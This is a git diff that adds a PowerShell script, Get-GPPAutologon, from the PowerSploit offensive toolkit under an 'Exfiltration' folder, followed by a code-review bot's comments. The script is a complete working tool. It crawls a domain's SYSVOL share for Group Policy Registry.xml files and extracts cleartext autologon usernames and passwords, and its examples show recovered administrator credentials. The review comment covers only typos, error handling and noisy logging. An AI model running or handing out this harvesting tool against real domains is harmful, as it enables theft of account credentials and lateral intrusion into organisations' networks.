Diffstat (limited to 'Exfiltration/Get-GPPAutologon.ps1')
-rw-r--r--Exfiltration/Get-GPPAutologon.ps1139
1 files changed, 139 insertions, 0 deletions
diff --git a/Exfiltration/Get-GPPAutologon.ps1 b/Exfiltration/Get-GPPAutologon.ps1
new file mode 100644
index 0000000..6a6f55b
--- /dev/null
+++ b/Exfiltration/Get-GPPAutologon.ps1
@@ -0,0 +1,139 @@
+function Get-GPPAutologon
+{
+<#
+.SYNOPSIS
+
+ Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
+
+ PowerSploit Function: Get-GPPAutologon
+ Author: Oddvar Moe (@oddvarmoe)
+ Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.DESCRIPTION
+
+ Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
+
+.EXAMPLE
+
+ PS C:\> Get-GPPAutolgon
+
+ UserNames File Passwords
+ --------- ---- ---------
+ {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
+ {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
+
+
+.EXAMPLE
+
+ PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
+
+ password
+ password12
+ password123
+ password1234
+ password1234$
+ read123
+ Recycling*3ftw!
+
+.LINK
+
+ https://support.microsoft.com/nb-no/kb/324737
+#>
+
+ [CmdletBinding()]
+ Param ()
+
+ #Some XML issues between versions
+ Set-StrictMode -Version 2
+
+ #define helper function to parse fields from xml files
+ function Get-GPPInnerFields
+ {
+ [CmdletBinding()]
+ Param (
+ $File
+ )
+
+ try
+ {
+ $Filename = Split-Path $File -Leaf
+ [xml] $Xml = Get-Content ($File)
+
+ #declare empty arrays
+ $Password = @()
+ $UserName = @()
+
+ #check for password and username field
+ if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
+ {
+ $props = $xml.GetElementsByTagName("Properties")
+ foreach($prop in $props)
+ {
+ switch ($prop.name)
+ {
+ 'DefaultPassword'
+ {
+ $Password += , $prop | Select-Object -ExpandProperty Value
+ }
+
+ 'DefaultUsername'
+ {
+ $Username += , $prop | Select-Object -ExpandProperty Value
+ }
+ }
+
+ Write-Verbose "Potential password in $File"
+ }
+
+ #put [BLANK] in variables
+ if (!($Password))
+ {
+ $Password = '[BLANK]'
+ }
+
+ if (!($UserName))
+ {
+ $UserName = '[BLANK]'
+ }
+
+ #Create custom object to output results
+ $ObjectProperties = @{'Passwords' = $Password;
+ 'UserNames' = $UserName;
+ 'File' = $File}
+
+ $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
+ Write-Verbose "The password is between {} and may be more than one value."
+ if ($ResultsObject)
+ {
+ Return $ResultsObject
+ }
+ }
+ }
+ catch {Write-Error $Error[0]}
+ }
+
+ try {
+ #ensure that machine is domain joined and script is running as a domain account
+ if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
+ throw 'Machine is not a domain member or User is not a member of the domain.'
+ }
+
+ #discover potential registry.xml containing autologon passwords
+ Write-Verbose 'Searching the DC. This could take a while.'
+ $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
+
+ if ( -not $XMlFiles ) {throw 'No preference files found.'}
+
+ Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
+
+ foreach ($File in $XMLFiles) {
+ $Result = (Get-GppInnerFields $File.Fullname)
+ Write-Output $Result
+ }
+ }
+
+ catch {Write-Error $Error[0]}
+} \ No newline at end of file
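Review bot: The comment-based help misspells the function name twice, as `Get-GPPAutologn` in .DESCRIPTION and `Get-GPPAutolgon` in the first .EXAMPLE, so the example as printed does not run; both should read `Get-GPPAutologon`. Both `catch` blocks report `$Error[0]` rather than the caught record; `catch { Write-Error $_ }` is the usual form and does not depend on the state of the global error list. `Write-Verbose "Potential password in $File"` sits inside the `foreach` over every `Properties` element, so it is emitted once per element whether or not the name matched, which makes the verbose trace misleading. The help could also state that the returned values are cleartext autologon credentials stored in `Registry.xml` under SYSVOL, since that is the finding a reader would need to remediate in Group Policy.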